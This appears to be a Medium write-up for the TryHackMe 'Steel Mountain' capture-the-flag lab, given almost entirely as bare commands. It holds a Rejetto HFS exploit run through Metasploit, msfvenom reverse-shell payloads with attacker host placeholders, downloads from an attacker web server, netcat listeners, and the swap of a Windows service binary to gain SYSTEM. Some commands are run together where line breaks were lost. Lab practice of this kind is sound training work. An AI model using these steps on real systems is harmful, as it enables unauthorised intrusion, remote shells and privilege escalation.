TryHackMe: Steel Mountain

  1. Deploy the machine.Who is the employee of the month?
nmap -Pn <ip>
nmap -sV -O <ip>
http://<ip>
nmap --script vuln <ip>
port 80 -> http-vuln-cve2015–1635
port 8080 —> http-vuln-cve2011–3192
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>
http://<ip>:8080
https://www.exploit-db.com/
msfconsolesearch 2014-6287
use 0show options
set RHOSTS <target ip>set RPORT 8080run
getsystemmigrate
cd /Usersls
cd billls
cd Desktopls
cat user.txt
  1. Upload Script
upload <path>
ls 
load powershellpowershell_shell
. .\Powerup.ps1Invoke-Allchecks
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -e x86/shikata_ga_nai -f exe -o ASCService.exe
use multi/handlerset LHOST <attacker ip>set LPORT <attacker port>
sessions 3
upload /root/Desktop/ASCService.exe
shellsc stop AdvancedSystemCareService9
copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc start AdvancedSystemCareService9
ps
migrate 648getsystem
cd /Users/Administrator/Desktoplscat root.txt
  1. Save script from https://www.exploit-db.com/exploits/39161
python -m SimpleHTTPServer 80
nc -lvp 4444
python rejetto.py <ip> 8080
mv ncat.exe nc.exe
python rejetto.py <ip> 8080
systeminfo
powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://<attacker ip>/winPEAS.exe"
dir
winPEAS.exe
AdvancedSystemCareService9C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
powershell -c "Get-Service"
cd \Program Files (x86)\IObit\Advanced SystemCare
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=1234 -f exe -o ASCService.exe
nc -lvp 1234
sc stop AdvancedSystemCareService9
rename ASCService.exe ASCService_bak.exe
powershell -c "Invoke-WebRequest -OutFile ASCService.exe http://10.8.3.50/ASCService.exe"
sc start AdvancedSystemCareService9

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store